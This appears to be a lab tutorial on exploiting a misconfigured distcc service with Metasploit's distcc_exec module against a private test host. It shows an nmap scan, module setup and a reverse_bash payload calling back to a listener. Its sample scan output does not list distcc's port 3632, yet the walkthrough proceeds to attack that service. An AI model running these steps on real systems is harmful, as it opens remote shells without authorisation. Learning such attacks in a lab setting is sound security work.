The Distcc service vulnerability principle:
Distcc is used for distributed compilation of large codebases on network servers. However, if misconfigured, it can be abused to execute commands. This vulnerability is present in XCode 1.5 and other versions of Distcc 2.x due to the lack of access restrictions on the server port.
In simple terms, the service lacks proper checks on ports and executed tasks, allowing attackers to leverage the distributed compilation tasks to execute their own commands.
Vulnerability indexes:
Vulnerability attack module code:
First, start msfconsole to enter the operation interface:
cd ~
msfconsole
Use the Nmap scanning tool to scan the target host for open ports:
nmap -sV -T4 192.168.122.102
Here's an example of the output you might see:
[*] exec: nmap -sV -T4 192.168.122.102
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-30 21:51 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0075s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
53/tcp open domain ISC BIND 9.4.2
111/tcp open rpcbind 2 (RPC #100000)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
MAC Address: 52:54:00:1E:9E:B4 (QEMU virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.41 seconds
Based on the scan results, search for the module corresponding to the port service you want to attack:
search distcc
In the Kali MSF terminal, use the use
command to select the appropriate module:
use exploit/unix/misc/distcc_exec
Then, use the show options
command to display the module parameters:
show options
Here's an example of the output you might see:
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasplo
it.html
RPORT 3632 yes The target port (TCP)
Payload options (cmd/unix/reverse_bash):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.28.140.88 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
Set the target host parameter RHOST to 192.168.122.102
set RHOST 192.168.122.102
Once everything is set, use the exploit
command to attack the host:
exploit
Press Ctrl+D to quit the Metasploit console then start the inspection